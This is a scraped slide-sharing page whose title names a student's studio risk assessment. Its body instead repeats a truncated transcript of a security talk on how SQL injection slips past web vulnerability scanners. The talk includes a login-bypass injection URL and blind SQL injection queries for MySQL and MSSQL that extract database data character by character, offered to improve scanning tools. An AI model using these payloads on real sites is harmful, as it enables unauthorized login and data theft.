Submit Search
Upload
Risk assesment for studio
•
Download as DOC, PDF
•
0 likes
•
239 views
A
ajibike
Follow
Report
Share
Report
Share
1 of 4
Download now
Recommended
Share Favorite Favorited X Download More... Favorited! Want to add tags? Have an opinion? Make a quick comment as well. Cancel Edit your favorites Cancel Send to your Group / Event Select Group / Event Add your message Cancel Post toBlogger WordPress Twitter Facebook Deliciousmore share options .Embed For WordPress.com Without related presentations 0 commentsPost a comment Post a comment .. Embed Video Subscribe to follow-up comments Unsubscribe from followup comments . Edit your comment Cancel .Notes on slide 1 no notes for slide #1 no notes for slide #1 ..Favorites, Groups & Events more How "·$% developers defeat the web vulnerability scanners - Presentation Transcript 1.How ?¿$·& developers defeat the most famous web vulnerability scanners …or how to recognize old friends Chema Alonso Informática64 José Parada Microsoft Ibérica 2.Agenda 1.- Introduction 2.- Inverted Queries 3.- Arithmetic Blind SQL Injection 4.- Time-Based Blind SQL Injection using Heavey Queries 5.- Conclusions 3.1.-Introduction 4.SQL Injection is still here among us 5.Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs 6.Need to Improve Automatic Scanning Not always a manual scanning is possible Time Confidentiality Money, money, money… Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools. 7.2.-Inverted Queries 8. 9.Homers, how are they? Lazy Bad trainined Poor Experience in security stuff Don´t like working Don´t like computing Don´t like coding Don´t like you! 10.Flanders are Left-handed 11.Right SELECT UID FROM USERS WHERE NAME=‘V_NAME’ AND PASSWORD=‘V_PASSW’; 12.Wrong? SELECT UID FROM USERS WHERE ‘V_NAME’=NAME AND ‘ V_PASSW’=PASSWORD 13.Login Inverted Query Select uid From users where ‘v_name’=name and ‘v_pass’=password http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1 Select uid From users where ‘Robert’=name and ‘Kubica’ or ‘1’=‘1’=password FAIL 14.Login Inverted SQL Injection an example Select uid From users where ‘v_name’=name and ‘v_pass’=password http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica Select uid From users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or ‘Kubica’=password Success 15.Blind Attacks Attacker injects code but can´t access directly to the data. However this injection changes the behavior of the web application. Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. Blind SQL Injection Biind Xpath Injection Blind LDAP Injection 16.Blind SQL Injection Attacks Attacker injects: “ True where clauses” “ False where clauses“ Ex: Program.php?id=1 and 1=1 Program.php?id=1 and 1=2 Program doesn’t return any visible data from database or data in error messages. The attacker can´t see any data extracted from the database. 17.Blind SQL Injection Attacks Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: Different hashes Different html structure Different patterns (keywords) Different linear ASCII sums “ Different behavior” By example: Response Time 18.Blind SQL Injection Attacks If any difference exists, then: Attacker can extract all information from database How? Using “booleanization” MySQL: Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) “ True-Answer Page” or “False-Answer Page”? MSSQL: Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) Oracle: Program.php?id=1 and 100>(Select ASCII(Sub
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scanners
Chema Alonso
Evaluation Question 1
Evaluation Question 1
ajibike
Evaluation Question 1
Evaluation Question 1
ajibike
Evaluation Question 1
Evaluation Question 1
ajibike
Persona mood board
Persona mood board
ajibike
Locations mood board
Locations mood board
ajibike
Props & costume mood board
Props & costume mood board
ajibike
Risk assesment for libary
Risk assesment for libary
ajibike
Recommended
Share Favorite Favorited X Download More... Favorited! Want to add tags? Have an opinion? Make a quick comment as well. Cancel Edit your favorites Cancel Send to your Group / Event Select Group / Event Add your message Cancel Post toBlogger WordPress Twitter Facebook Deliciousmore share options .Embed For WordPress.com Without related presentations 0 commentsPost a comment Post a comment .. Embed Video Subscribe to follow-up comments Unsubscribe from followup comments . Edit your comment Cancel .Notes on slide 1 no notes for slide #1 no notes for slide #1 ..Favorites, Groups & Events more How "·$% developers defeat the web vulnerability scanners - Presentation Transcript 1.How ?¿$·& developers defeat the most famous web vulnerability scanners …or how to recognize old friends Chema Alonso Informática64 José Parada Microsoft Ibérica 2.Agenda 1.- Introduction 2.- Inverted Queries 3.- Arithmetic Blind SQL Injection 4.- Time-Based Blind SQL Injection using Heavey Queries 5.- Conclusions 3.1.-Introduction 4.SQL Injection is still here among us 5.Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs 6.Need to Improve Automatic Scanning Not always a manual scanning is possible Time Confidentiality Money, money, money… Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools. 7.2.-Inverted Queries 8. 9.Homers, how are they? Lazy Bad trainined Poor Experience in security stuff Don´t like working Don´t like computing Don´t like coding Don´t like you! 10.Flanders are Left-handed 11.Right SELECT UID FROM USERS WHERE NAME=‘V_NAME’ AND PASSWORD=‘V_PASSW’; 12.Wrong? SELECT UID FROM USERS WHERE ‘V_NAME’=NAME AND ‘ V_PASSW’=PASSWORD 13.Login Inverted Query Select uid From users where ‘v_name’=name and ‘v_pass’=password http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1 Select uid From users where ‘Robert’=name and ‘Kubica’ or ‘1’=‘1’=password FAIL 14.Login Inverted SQL Injection an example Select uid From users where ‘v_name’=name and ‘v_pass’=password http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica Select uid From users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or ‘Kubica’=password Success 15.Blind Attacks Attacker injects code but can´t access directly to the data. However this injection changes the behavior of the web application. Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. Blind SQL Injection Biind Xpath Injection Blind LDAP Injection 16.Blind SQL Injection Attacks Attacker injects: “ True where clauses” “ False where clauses“ Ex: Program.php?id=1 and 1=1 Program.php?id=1 and 1=2 Program doesn’t return any visible data from database or data in error messages. The attacker can´t see any data extracted from the database. 17.Blind SQL Injection Attacks Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: Different hashes Different html structure Different patterns (keywords) Different linear ASCII sums “ Different behavior” By example: Response Time 18.Blind SQL Injection Attacks If any difference exists, then: Attacker can extract all information from database How? Using “booleanization” MySQL: Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) “ True-Answer Page” or “False-Answer Page”? MSSQL: Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) Oracle: Program.php?id=1 and 100>(Select ASCII(Sub
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scanners
Chema Alonso
Evaluation Question 1
Evaluation Question 1
ajibike
Evaluation Question 1
Evaluation Question 1
ajibike
Evaluation Question 1
Evaluation Question 1
ajibike
Persona mood board
Persona mood board
ajibike
Locations mood board
Locations mood board
ajibike
Props & costume mood board
Props & costume mood board
ajibike
Risk assesment for libary
Risk assesment for libary
ajibike
Risk assesment for canteen
Risk assesment for canteen
ajibike
Risk assesment for gym
Risk assesment for gym
ajibike
Risk assesment for stanley
Risk assesment for stanley
ajibike
Mission statement
Mission statement
ajibike
Mission statement
Mission statement
ajibike
Mood board of production logo ideas
Mood board of production logo ideas
ajibike
Audition poster
Audition poster
ajibike
My pitch[1]
My pitch[1]
ajibike
Magazine Advert Analysis
Magazine Advert Analysis
ajibike
Digi pak
Digi pak
ajibike
Digi pak Analysis
Digi pak Analysis
ajibike
Digi pack
Digi pack
ajibike
Digi pak
Digi pak
ajibike
Part one: Real Thriller Openings
Part one: Real Thriller Openings
ajibike
Part Two: My Thriller Opening
Part Two: My Thriller Opening
ajibike
The Number 23 Time Line
The Number 23 Time Line
ajibike
My Story Board
My Story Board
ajibike
Proposal
Proposal
ajibike
Location Mood Board
Location Mood Board
ajibike
Props Mood Board
Props Mood Board
ajibike
More Related Content
More from ajibike
Risk assesment for canteen
Risk assesment for canteen
ajibike
Risk assesment for gym
Risk assesment for gym
ajibike
Risk assesment for stanley
Risk assesment for stanley
ajibike
Mission statement
Mission statement
ajibike
Mission statement
Mission statement
ajibike
Mood board of production logo ideas
Mood board of production logo ideas
ajibike
Audition poster
Audition poster
ajibike
My pitch[1]
My pitch[1]
ajibike
Magazine Advert Analysis
Magazine Advert Analysis
ajibike
Digi pak
Digi pak
ajibike
Digi pak Analysis
Digi pak Analysis
ajibike
Digi pack
Digi pack
ajibike
Digi pak
Digi pak
ajibike
Part one: Real Thriller Openings
Part one: Real Thriller Openings
ajibike
Part Two: My Thriller Opening
Part Two: My Thriller Opening
ajibike
The Number 23 Time Line
The Number 23 Time Line
ajibike
My Story Board
My Story Board
ajibike
Proposal
Proposal
ajibike
Location Mood Board
Location Mood Board
ajibike
Props Mood Board
Props Mood Board
ajibike
More from ajibike
(20)
Risk assesment for canteen
Risk assesment for canteen
Risk assesment for gym
Risk assesment for gym
Risk assesment for stanley
Risk assesment for stanley
Mission statement
Mission statement
Mission statement
Mission statement
Mood board of production logo ideas
Mood board of production logo ideas
Audition poster
Audition poster
My pitch[1]
My pitch[1]
Magazine Advert Analysis
Magazine Advert Analysis
Digi pak
Digi pak
Digi pak Analysis
Digi pak Analysis
Digi pack
Digi pack
Digi pak
Digi pak
Part one: Real Thriller Openings
Part one: Real Thriller Openings
Part Two: My Thriller Opening
Part Two: My Thriller Opening
The Number 23 Time Line
The Number 23 Time Line
My Story Board
My Story Board
Proposal
Proposal
Location Mood Board
Location Mood Board
Props Mood Board
Props Mood Board
Download now